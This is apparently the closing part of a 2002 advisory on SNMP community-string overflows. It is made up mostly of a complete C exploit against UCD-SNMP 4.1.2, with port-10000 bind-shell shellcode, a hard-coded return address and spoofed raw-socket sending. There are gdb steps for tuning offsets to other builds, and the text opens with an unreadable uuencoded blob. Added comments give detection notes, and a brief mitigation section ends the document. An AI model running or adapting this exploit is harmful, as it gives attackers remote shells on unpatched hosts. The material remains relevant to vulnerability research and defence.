	M#\"X,GC#\'[,:@=$CQU$MG#Q2(2D/F_.RZ5MK`*5<?U=R%!1W1;C%NV(&J4?E3

	MY(5@\"4;HE<^&*^D#JB2(RL&GNLQ1,.44:M#:RS15#)]/6-+)D!0!0#O3\'\\FI

	MD4Q%X8KGRH+#YV.>A%!8[R-U%U,N%D&!(I.?4_VSH\\L@HUS,:)\'(&UE99<JX

	MY27/<P9BH]^K^$\'>(/\"IICN55*0RLUD[RB!A!>(_^%P\'EIU\"RBM!PZL>1D?%

	MP>7UZYT-YO#DN.XUFUZ]V:(\\+>`$Q6Y(B7_RZJ[W\"V5BX6__3_7QT<E>=MXI

	MR)./JT+G\'1\\U.LYYL=SA_\'A\'53[.!#/N4!)%SC[:1/E`(PG[6_!TPQC4ZWSR

	MJ#G`^I*.$3$%+C4%O9\'%HO[[L_N+HXZY]RXQ@>M4)X)\"3R@J=^3<Q\'/X]PEH

	MPN4\"\\P2/P&S&0]L`?U0=3O<P]R2(<NFD<Z;2<(K\"O*-9_\"LMCZ9]J\"@?:KJ\'

	MX,L/9:EV>P\\GH:&2R,W1>]GH3WPLK_F7/SG?!R.,$;[[DW,-VN\'N+L5*H?#9

	M^0?PV_[DG**#X?REX>R[@T\'SH.\'L\'>=7$TFN7]$]%H9Z!L]($00D@F_\\]!.&

	MQC#(LBXL\'@:+.QI[<C?$?URWTVLL/B_TY&QZ:.U,M`P^*-&]O1+]*^Z0ZD&N

	M_;;1/II<#:62TP;&1]A!^/[X7S<T?.?_+:4F\\`\\Z$*C#7W8WUCRS9EIPLR5J

	M*_UGY_7/G:R7UPLLSPT>U?L0,W!\'SH_0L[-WKV].K@[/KYSSZ70I]P!JSL=X

	MN@13SOWN$!Y@SFD?\\\"0<CT#VQU\']QR\"=!H_@CUZ_N3ARFB!DW\'JWU6IWZX.\"

	MV>IF_7CK)S,P22;`N_$DXCX<7U\\T7-JO4[#DC58\'T.H[&#XHK7_QEW<S4%#K

	MYQ/L+O(I_#1R#Z?2C+T/-S^6+;4:E>MYK5:]W>K46P6CZN5XD+?5C\\\'M\'@_K

	M;1A]DFM\'MHFD(@\'9[0@,,(/\"E5MX\\`CQ#[ZJ&3M[6,JCJQQ_LL5R+:C4?L>\\

	M2P)>VR2*I_%8+#*:YG6SR1&@A^!V=6_8/ZW9(\'UC<G`P.!GXO,S-%=]O2FW;

	MFHQ5/?1WYV^V=1(VQ%0(Y_IH_K*FBX-<%W^,D^E(^B>\'2F)6;^A&&H+SE#0F

	M00.%^7\\GT!RV_8\"TD*MTK[8]N%;4N4VCGR734P_6R)UU.:D;?UXS?:ZIB\\4D

	MX68WF;%%WZH&[%0LLAVHOO<H_%S/<H:-KX[E3^?XR/DARYI\'\"_::S$)*3L:U

	M-.V*J]?\']ETNV\"+3QS3,4FZOWE_>7%[GH]UL#M8X`&<DZ?.]J50UJ%-3B8?R

	MCISX(/<A;*`LTF\\F[))YK[M/1%`@Q%,$TU\'6OYKXHD4&R[.Q?$!;\'?SWQM`_

	M5\";RX21^6,2\'8!\"\":&O6F^UL/2J\\(Z?.F_H+%L>/X/O$#Z7Z2_O5CUC1H3R`

	MMD%UPI]#NBEVB#2MO53ZC<U]?<0PV`D&*)WW,9IES@-6G^9#0>::W7L/NUSN

	MQQTF1+S4\"`K?*AX%3G1=(O66F(]C=N(F%`)/_T_9440/=W121+L_\"AY`PR_(

	M5H6^\';K-9AO^ZZXJU/*O%8Y#&`4=F68M$_[7PG^EET\">OT,]2EVAOPYG(49D

	MXKO%H?>)!.[J`*J]JI,N-DFKVU5I=9M)JS=\'SOM@2K?>Z$+<-=W%R8DH.N4*

	M*(K\'VER\'<(S[.YA>[4LP@Z8.G7%,0EZRKWI#WBX?.9FOT0#YVD/B,UI7`\"S$

	M1V#D/8.E2/X\\\'AA(\\%X.\'AA,U)%L%B<[>BN0906Z(\'R82NBWX,ML<M^\\O3SY

	MEW_]<`EKOT<V$&CG3]C>6_\\V5=>C4[\"Y4*N>)$\'P:?_]`:<VT$1D$UN3B_8D

	MI\"5SU@G$34CUT0LR\'8;J;Y=C%8<+$^\'\',8=UD4I.GC=`T.$LX9GZH^/6,!><

	M3T:SNP^DCNCHL>;<>_!/JR91%22H)EY>HQND[RXOX%G\\CU?3<=FK!&^Y)V@6

	MU9S5*<\'D&:8(V@4,>.P>@:]QG(SB:.J.!+ZDC%!]#HLWN8Q9-]:P>,/!1*1W

	M\"UJV%(D6;*S\"1TPI8*XRF\\^X;C!(3`W\'!/J43JDHGP73.4BV\\4\'.<A&CV<CW

	M[\'G@/(-JJNF_W@E+$_R[)=>859(-QWF0(N;X<&XTD@D^3WQPAL)[.G.BE!^^

	M_JS7GM2\\,KPH(JSA93/U#^ND5@1W$K#4+(P03J#A7.*!6!]812\\^\'?G)N9OF

	M@WD\\7X+69TIX!B;DX\'/]_+R&],(Z<HDU1CJ\"$50%VL)RO,OWH#XL5-C\')HCG

	MF`\\I9H50,N8)!;`Y4GD]3,+Y0BYZ4D*2/XW57:V4?J0)D0.9;+?=!%/T7%B<

	M4^#P_/\"2EA9=%JE\\F.<[D*@W6JQ>R56).0@I-.?3US]OR;BK>MDMNP\"Y]YJ^

	M0?:L3$4R_$QB_!51*TC\\^X7,W2MSC.GB<4K\']*]_IB0&S*+\'R3JYOO:`P>@T

	MM^\'\\&]HLLE;``.,)\'V;QH2]>%I!3L<4OA%9S*(`B?[YYAQ/Z_P%02P$\"%@L4

	M````\"`\".BDTL>B:5QI%6``#=>P$`(``````````!`\"``@($`````4%)/5$]3

	M(%1E<W0M4W5I=&4@8S`V+7-N;7!V,2YH=&U02P4&``````$``0!.````SU8`

	#````

	`

	end

	

	

	 Update (14 March 2002)

	 ======

	

	Jove posted an exploit for UCD-SNMP under Linux (Slackware 8.0):
	

	/*--------------------------------------------------------------------------*

	 *	Exploits bugs in community string overflows for snmp implementations	*

	 *	Coded by:	Jove (jove@halo.nu)											*

	 *	Portions provided by:	RPC, and Zen-Parse								*

	 *--------------------------------------------------------------------------*/

	

	/*--------------------------------------------------------------------------*

	 *	Explanation:															*

	 *	As found by the Protos project, many implementations of SNMP are		*

	 *	fallible to overly-long community strings.  In some implementations		*

	 *	it is possible to use this to take control over the system snmpd is		*

	 *	running on.  This program is an implementation of how such community	*

	 *	strings might be used to take over said system.  The framework here has	*

	 *	been designed to be extensible to encompass exploitation over multiple	*

	 *	snmp implementations, over multiple architectures, and with the			*

	 *	the possibility to evade IDS implementations.  If someone does extend	*

	 *	this code through targets, or actual code update I ask that they share	*

	 *	it with me (jove@halo.nu) and all persons involved if they wish can		*

	 *	share with others that send in code fixes so that this exploit can be	*

	 *	fine tuned.  RPC provided the framework for which to send the packets	*

	 *	that is used with slight modifications by myself, I extended it into	*

	 *	this exploit which is much more extendable, and has a working target,	*

	 *	made it easier to use and nicer to look at, added support for multiple	*

	 *	targets, and ripped out ugly things such as globals.  Here are some		*

	 *	instructions to get it working on your implementation of ucd-snmpd and	*

	 *	others that derive their snmp parsing code from ucd's implementation.	*

	 *--------------------------------------------------------------------------*

	 *	Required values for successful exploitation on x86 arch ucd-snmp:		*

	 *	1.)	rets_position														*

	 *	2.) ret_address															*

	 *--------------------------------------------------------------------------*

	 *	Easy way to obtain 1:													*

	 *	A.)	Run GDB with the path to snmp ie: gdb `which snmpd`					*

	 *	B.) At the <gdb> type run												*

	 *	C.)	Run this exploit against the host with snmpd running on it.			*

	 *	D.)	GDB should error out saying Segmentation Fault with an address.		*

	 *	E.)	Take the farthest right hex digits and convert to decimal.			*

	 *	F.) This will be your rets_position... if the buffer is bigger than	256	*

	 *		you may need to multiply it by 0xff X times where X <= bufsize / 255*

	 *--------------------------------------------------------------------------*

	 *	Easy way to obtain 2:													*

	 *	A.) Run GDB with the path to snmpd ie: gdb `which snmpd`				*

	 *	B.)	at prompt type break _snmp_parse									*

	 *	C.)	type run															*

	 *	D.)	run exploit against system running the snmpd you\'re debugging		*

	 *	E.)	when it gets to the breakpoint type print &data						*

	 *	F.)	add about 100 to this address and you have your ret_address			*

	 *--------------------------------------------------------------------------*

	 *	The methodology for anything other than a linux running ucd-snmpd is	*

	 *	beyond the scope of these comments, and I refer you to phrack 49 for	*

	 *	more information.														*

	 *--------------------------------------------------------------------------*/

	#include <unistd.h>

	#include <netdb.h>

	#include <arpa/inet.h>

	#include <netinet/in.h>

	#include <netinet/ip.h>

	#include <netinet/udp.h>

	#include <sys/types.h>

	#include <sys/socket.h>

	

	/*---	Local Defines	---*/

	/* Byte counts of the two fixed SNMP fragments snmp_asn1 and snmp_asn2 */
	/* (terminating NUL not counted); make_packet() copies exactly this many. */
	#define ASN1_SZ 11

	#define ASN2_SZ 36

	/* Combined size of the IP and UDP headers that make_packet() fills in. */
	/* NOTE(review): HDR_SZ and PACKET_SZ expand to unparenthesized sums; the */
	/* uses visible in this file are all additive, so the result is unchanged. */
	#define HDR_SZ sizeof(struct iphdr) + sizeof(struct udphdr)

	#define PACKET_SZ ASN1_SZ + ASN2_SZ

	/* Size of the community-string scratch buffer in main(); main() refuses */
	/* a target whose buffer_size is larger than MAX_BUFF-1. */
	#define MAX_BUFF	4096

	/*-------------------------*/

	

	/*---	One entry per supported target: the per-target	---*
	 *---	values main() reads when it builds the community	---*
	 *---	string.  The table using this type ends with an		---*
	 *---	entry whose description is NULL.					---*/

	struct target_os {

	  char *description;		//Human-readable label, printed by usage().

	  char *shellcode;			//NUL-terminated payload bytes; main() measures it with strlen().

	  int buffer_size;			//Number of community-string bytes main() generates.

	  int rets_position;		//Offset in that buffer where ret_address is written.

	  u_int32_t ret_address;	//Value written at rets_position (copied in host byte order).

	  char nop;					//Fill byte used for the rest of the buffer.

	};

	/*-------------------------------------------------*/

	

	

	/*---	snmp_asn1 is placed before the community string and	---*
	 *---	snmp_asn2 after it (see make_packet); the values	---*
	 *---	were taken from RPC's code.							---*
	 *
	 * Read as BER, snmp_asn1 is a SEQUENCE header (30 82 01 23), an
	 * INTEGER 0 version field, i.e. SNMPv1 (02 01 00), and an OCTET STRING
	 * header that declares a 256-byte community (04 82 01 00).  snmp_asn2
	 * is a GetRequest PDU (a0) with a 4-byte request-id, zero error-status
	 * and error-index, and one varbind for OID 1.3.6.1.2.1.1.5.0 with a
	 * NULL value.
	 *
	 * Detection note: the declared community length is fixed in these
	 * bytes, and a community field of that size is unusual for legitimate
	 * managers, so it is a usable feature for IDS rules and capture review.
	 */

	char snmp_asn1[] =	\"\\x30\\x82\\x01\\x23\\x02\\x01\\x00\\x04\\x82\\x01\\x00\";		//11 bytes 

	char snmp_asn2[] =	\"\\xa0\\x82\\x00\\x20\\x02\\x04\\x57\\xc6\\x36\\xf6\\x02\\x01\"

						\"\\x00\\x02\\x01\\x00\\x30\\x82\\x00\\x10\\x30\\x82\\x00\\x0c\"

						\"\\x06\\x08\\x2b\\x06\\x01\\x02\\x01\\x01\\x05\\x00\\x05\\x00\";	//36 bytes

	/*---------------------------------------------------------*/

	

	/*---	Zen-parse's port 10,000 port-binding Linux shellcode	---*
	 *
	 * x86 machine code that makes its system calls through int 0x80
	 * (cd 80).  The bytes 27 10 are port 10000 in network byte order and
	 * the two pushed words spell //bin/sh, which agrees with the
	 * description above.  The array holds no zero byte before its
	 * terminator, so strlen() in main() measures the whole payload.
	 *
	 * Detection note: on a host running an affected snmpd, an unexpected
	 * listener on port 10000 owned by the snmpd process, or snmpd starting
	 * a shell, is the indicator to look for.
	 */

	char zenparse_code[] =

	\"\\x31\\xc0\\x31\\xdb\\x89\\xe5\\x99\\xb0\\x66\\x89\\x5d\\xfc\\x43\\x89\\x5d\\xf8\"

	\"\\x43\\x89\\x5d\\xf4\\x4b\\x8d\\x4d\\xf4\\xcd\\x80\\x89\\x45\\xf4\\x43\\x66\\x89\"

	\"\\x5d\\xec\\x66\\xc7\\x45\\xee\\x27\\x10\\x89\\x55\\xf0\\x8d\\x45\\xec\\x89\\x45\"

	\"\\xf8\\xc6\\x45\\xfc\\x10\\xb2\\x66\\x89\\xd0\\x8d\\x4d\\xf4\\xcd\\x80\\x89\\xd0\"

	\"\\xb3\\x04\\xcd\\x80\\x43\\x89\\xd0\\x99\\x89\\x55\\xf8\\x89\\x55\\xfc\\xcd\\x80\"

	\"\\x31\\xc9\\x89\\xc3\\xb1\\x03\\xb0\\x3f\\x49\\xcd\\x80\\x41\\xe2\\xf8\\x52\\x68\"

	\"\\x6e\\x2f\\x73\\x68\\x68\\x2f\\x2f\\x62\\x69\\x89\\xe3\\x52\\x53\\x89\\xe1\\xb0\"

	\"\\x0b\\xcd\\x80\";

	/*-----------------------------------------------------------------*/

	

	/*---	Function prototypes		---*/

	unsigned short in_cksum(u_short *, int);	//16-bit Internet checksum over a buffer; used for the IP header

	unsigned int resolve(char *host);	//Resolves a host name or dotted-quad string to an address; taken from RPC

	char *make_packet(char *, unsigned int, unsigned int, int);	//Builds the raw IP/UDP/SNMP packet; by RPC, modified by Jove

	void usage(char *);	//Prints the usage text and target list, then exits

	/*---------------------------------*/

	/*
	 * Target table, indexed in main() by the -t value and listed by usage().
	 * The last entry has a NULL description and marks the end of the table.
	 *
	 * NOTE(review): the single real entry hard-codes ret_address; presumably
	 * this is a stack address observed on that one build.  A payload that
	 * depends on a fixed address like this is what address-space
	 * randomization and non-executable stacks are meant to break.
	 */
	struct target_os the_targets[]= {

	//description, shellcode ptr, buffer size, Position of ret address, Address to return into, NOP to use

	{\"UCD-SNMP 4.1.2 / Slackware 8.0 src compilation (bindport 10,000)\",zenparse_code,256,216,0xbfffd77c,0x90},

	{(char *) NULL, (char *) NULL, 0, 0, 0, (char) 0} };

	

	/*
	 * Entry point.  Parses the command line, builds the community string
	 * for the selected the_targets[] entry, has make_packet() wrap it in an
	 * IP/UDP/SNMP packet, and sends that packet once over a raw socket.
	 * Nothing is read back from the network.
	 *
	 * Returns 0 after a successful send; exits with 1 when socket(),
	 * setsockopt() or sendto() fails and with -1 when the target's
	 * buffer_size does not fit in MAX_BUFF.
	 *
	 * Defender notes, from what this code shows:
	 *  - The socket is SOCK_RAW with IP_HDRINCL, so the IP source address
	 *    is whatever the sender chooses (-s).  Source-address restrictions
	 *    on an SNMP agent therefore do not authenticate the sender.
	 *  - Creating such a socket normally needs elevated privileges on the
	 *    sending host.
	 *  - NOTE(review): the -t value is used as an array index without a
	 *    range check.
	 */
	int

	main(int argc, char *argv[])

	{

		/*---	Constant definitions	---*/

		const int one = 1;	/* option value handed to setsockopt(IP_HDRINCL) */

		/*---------------------------------*/

		/*---	Networking Variables	---*/

		struct sockaddr_in sin;

		u_int32_t addr;

		int sock;

		int src;

		int dst=-1;	/* -1 means no -d option was given */

		/*---------------------------------*/

		/*---	Exploitation Variables	---*/

		char buf[MAX_BUFF];

		char *p;

		int ret;

		int shellcodelen;

		int retpos;

		int buffersize;

		/*---------------------------------*/

		/*---	Option Handling Variables	---*/

		int arg;

		int cnt;		

		int typeosys=0;	/* index into the_targets[], set by -t */

		int debugit=0;

		int port=161;

		int echo=0;

		/*-------------------------------------*/

	

		if(argc < 3)

			usage(argv[0]);

	

		/* Default source address; replaced when -s is given. */
		src = resolve(\"127.0.0.1\"); 

	

		/* Option parsing; usage() describes what each switch is meant to do. */
		while((arg = getopt(argc, argv, \"es:d:t:x:p:\")) != -1) {

			switch(arg) {

				case \'e\':

					echo = 1;

					break;

				case \'s\':

					src = resolve(optarg);

					break;

				case \'d\':

					dst = resolve(optarg);

					break;

				case \'t\':

					typeosys = atoi(optarg);

					break;

				case \'x\':

					debugit=1;

					break;

				case \'p\':

					port = atoi(optarg);

				default:

					printf(\"Invalid argument, %c\\n\",arg);

					usage(argv[0]);

			}

		}

	

		if(dst == -1) {

			printf(\"Missing destination address.\\n\");

			usage(argv[0]);

		}

	

		/* Load the per-target values from the selected table entry. */
		shellcodelen= strlen(the_targets[typeosys].shellcode);

		addr= the_targets[typeosys].ret_address;

		retpos=	the_targets[typeosys].rets_position;

		buffersize=the_targets[typeosys].buffer_size;

		

		/* buf[buffersize] is written below, so buffersize must stay under MAX_BUFF. */
		if(buffersize>MAX_BUFF-1) {

			printf(\"Must increase MAX_BUFF define to something >= %d\\n\",buffersize);

			exit(-1);

		}

	

		/* Fill with the target's fill byte, write the address at retpos, */
		/* and copy the payload so that it ends where the address begins. */
		memset(buf, the_targets[typeosys].nop, buffersize);

		memcpy(buf + retpos, &addr, sizeof(addr));

		memcpy(buf + retpos - shellcodelen, the_targets[typeosys].shellcode, shellcodelen);

	

		/* -x: replace the contents from index 1 on with an ascending byte */
		/* pattern (each byte is its own index truncated to char). */
		if(debugit==1) {

		  for(cnt=1;cnt<buffersize;cnt++)

		    buf[cnt]=(char) cnt;

		}

	

		/* make_packet() measures the string with strlen(), so terminate it. */
		buf[buffersize] = \'\\0\';

	

		p = make_packet(buf, src, dst, echo);

	

		/*---	Create the socket to send data on	---*/

		sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);

		if(sock == -1) {

			perror(\"socket\");

			exit(1);

		}

		/*---------------------------------------------*/

	

		/*---	Setup the socket\'s options	---*/

		/* IP_HDRINCL: the IP header built in make_packet() is sent as given. */
		if(setsockopt(sock, IPPROTO_IP, IP_HDRINCL, &one, sizeof(one)) == -1) {

			perror(\"setsockopt\");

			exit(1);

		}

		/*-------------------------------------*/

	

		/*---	Setup the Socket type/dest	---*/

		sin.sin_family = AF_INET;

		sin.sin_port = htons(port);

		sin.sin_addr.s_addr = dst;

		/*-------------------------------------*/

	

		/*---	Send the udp packet and error check	---*/

		printf(\"Sending Packet...\");

		ret = sendto(sock, p, HDR_SZ + PACKET_SZ + buffersize, 0, &sin, sizeof(sin));

		if(ret == -1) {

			perror(\"sendto\");

			exit(1);

		}	

		printf(\"sent.\\n\");

		/*---------------------------------------------*/

	

		return(0);

	}

	

	/*
	 * Prints the banner, the option summary and one line per entry of
	 * the_targets[] (up to the entry with a NULL description), then calls
	 * exit(0).  It never returns to the caller.
	 *
	 * cmd  program name as passed by main() (argv[0]).
	 *
	 * NOTE(review): the "Usage: %s" line passes no argument for its %s, so
	 * cmd is never printed and that printf call has undefined behaviour.
	 */
	void usage(char *cmd)

	{

	  int cnt;

	

		/*---	Print out a pretty usage and exit(0);	---*/

		printf(\"Snmp exploitation utility, Version 2\\n\");

		printf(\"Coding by Jove w/ segments from RPC\\n\");

		printf(\"Usage: %s <options> [-d destination]\\n\");

		printf(\"Switches:\\n\");

		printf(\"\\t\\t-s <IP>\\n\\t\\t\\tSource address to use.\\n\");

		printf(\"\\t\\t-p [Port]\\n\\t\\t\\tSpecify port to send to.\\n\");

		printf(\"\\t\\t-e\\tDestination is an echo server (to bounce packet).\\n\");

		printf(\"\\t\\t  \\t(Source and destination are reversed for echo mode.\\n\");

		printf(\"\\t\\t-x\\tUse an ascending value buffer for the community string.\\n\");

		printf(\"\\t\\t  \\t(Used for finding values to use w/ this exploit.\\n\");

		printf(\"\\t\\t-t#\\tSpecify a target to use for packet creation\\n\");

		printf(\"\\tAvailable Targets:\\n\");

		/* The table ends at the first entry whose description is NULL. */
		for(cnt=0;the_targets[cnt].description!=(char *) NULL;cnt++)

		  printf(\"\\t%d- %s\\n\",cnt,the_targets[cnt].description);

		exit(0);

	}

	

	/*
	 * Internet-style checksum: adds the buffer as 16-bit words, folds the
	 * carries back into the low 16 bits and returns the one's complement
	 * of the result.
	 *
	 * addr  start of the data, read as u_short words
	 * len   number of bytes to cover; an odd trailing byte is included
	 *
	 * Written as an old-style (K&R) definition; the prototype earlier in
	 * the file supplies the parameter types to callers.  The only call
	 * visible in this file is over the IP header in make_packet().
	 */
	unsigned short 

	in_cksum(addr, len)	//Standard checksum calculation code 

	u_short *addr;

	int len;

	{

	    register int nleft = len;

	    register u_short *w = addr;

	    register int sum = 0;

	    u_short answer = 0;

	

	    /*
	     * A 32-bit accumulator (sum) collects sequential 16-bit words; the
	     * carry bits from its top 16 bits are folded into the lower 16 bits
	     * at the end.
	     */

	    while (nleft > 1)  {

	        sum += *w++;

	        nleft -= 2;

	    }

	

	    /* One byte left over: store it in the first byte of answer (the */
	    /* second byte stays zero) and add that 16-bit value. */

	    if (nleft == 1) {

	        *(u_char *)(&answer) = *(u_char *)w ;

	        sum += answer;

	    }

	

	    /* add back carry outs from top 16 bits to low 16 bits */

	    sum = (sum >> 16) + (sum & 0xffff); /* add hi 16 to low 16 */

	    sum += (sum >> 16);         /* add carry */

	    answer = ~sum;              /* truncate to 16 bits */

	    return(answer);

	}

	/*
	 * Turns a host name or dotted-quad string into an address value.
	 * gethostbyname() is tried first; when it fails the string is handed to
	 * inet_addr().  If that also fails the function prints an error and
	 * calls exit(1), so callers never see a failure value.
	 *
	 * host     name or address string
	 * returns  the address as produced by gethostbyname()/inet_addr(),
	 *          which main() stores unchanged in the packet and in sin
	 *
	 * NOTE(review): the memcpy copies he->h_length bytes into an unsigned
	 * int, which assumes a 4-byte address.  inet_addr() reports failure
	 * with a value that is also the encoding of 255.255.255.255.
	 */
	unsigned int resolve(char *host)	//Resolves a host; taken from RPC

	{

	    struct hostent *he;

	    unsigned int ipaddr;

	

	    if((he = gethostbyname(host)) == NULL) {

	        /* not resolvable as a name: either a literal address or invalid */

	      if((ipaddr = inet_addr(host)) == -1) {

	        printf(\"error resolving %s.\\n\", host);

	        exit(1);

	      }

	      return ipaddr;

	    }

	    memcpy(&ipaddr, he->h_addr, he->h_length);

	  return ipaddr;

	}

	

	/*
	 * Allocates and fills one complete packet: IP header, UDP header, then
	 * snmp_asn1, the community string and snmp_asn2.
	 *
	 * buf   NUL-terminated community string; its length is taken with strlen()
	 * src   value stored in the IP source address field
	 * dst   value stored in the IP destination address field
	 * echo  non-zero selects UDP source port 161 and destination port 7;
	 *       zero selects a rand() source port and destination port 161
	 *
	 * Returns the malloc()ed packet; the caller owns it.  The result of
	 * malloc() is not checked before it is written to.
	 *
	 * Defender notes: the header fields set here are fixed (DF set, TTL
	 * 0x40, UDP checksum 0) and only the IP id and, outside echo mode, the
	 * UDP source port come from rand().  Echo mode depends on a reachable
	 * UDP port 7 service, so filtering that service removes the bounce path.
	 */
	char *

	make_packet(char *buf, unsigned int src, unsigned int dst, int echo)

	/*---	This code has its roots in RPC's code; Jove		--*
	 *---	changed it so that it uses no globals and the	--*
	 *---	buffer size can vary.  The random number		--*
	 *---	generator is seeded here to randomize the ID	--*
	 *---	field.											--*/  

	{

		struct iphdr *ip;

		struct udphdr *udp;

		char *p;

		int bufsz;

	

		bufsz=strlen(buf);

	

		p   = (char *)malloc(HDR_SZ + PACKET_SZ + bufsz);

		ip  = (struct iphdr *)p;

		udp = (struct udphdr *)(p + sizeof(*ip));

	

		/* IPv4 header, 5 words long (no options). */
		ip->ihl = 5;

		ip->version = 4;

		ip->tos = 0;

		ip->tot_len = htons(HDR_SZ + PACKET_SZ + bufsz);

		/* Seeded from the clock on every call; rand() then supplies the id. */
		srand(time(NULL));

		ip->id = rand(); 

		ip->frag_off = htons(IP_DF);

		ip->ttl = 0x40;

		ip->protocol = IPPROTO_UDP;

		ip->saddr = src;

		ip->daddr = dst;

		/* Checksum covers the IP header only. */
		ip->check = in_cksum((char *)ip, sizeof(*ip));

	

		udp->source = echo ? htons(161) : rand();

		udp->dest = echo? htons(7) : htons(161);

		udp->len = htons(PACKET_SZ + bufsz);

		/* The UDP checksum field is left at zero. */
		udp->check = 0; 

	

		/* Payload layout: snmp_asn1, community string, snmp_asn2. */
		memcpy(p + HDR_SZ, snmp_asn1, ASN1_SZ);

		memcpy(p + HDR_SZ + ASN1_SZ, buf, bufsz);

		memcpy(p + HDR_SZ + ASN1_SZ + bufsz, snmp_asn2, ASN2_SZ);

		return p;

	}

	

SOLUTION

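	All vendors are releasing patches as time goes on. Until a patch is
	installed, you should consider disabling SNMP, or at least make sure it
	is firewalled. Because SNMP runs over UDP and the exploit above sets its
	own source address (and can bounce the packet off a UDP echo service),
	filter SNMP at the network boundary rather than relying on
	source-address restrictions alone.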
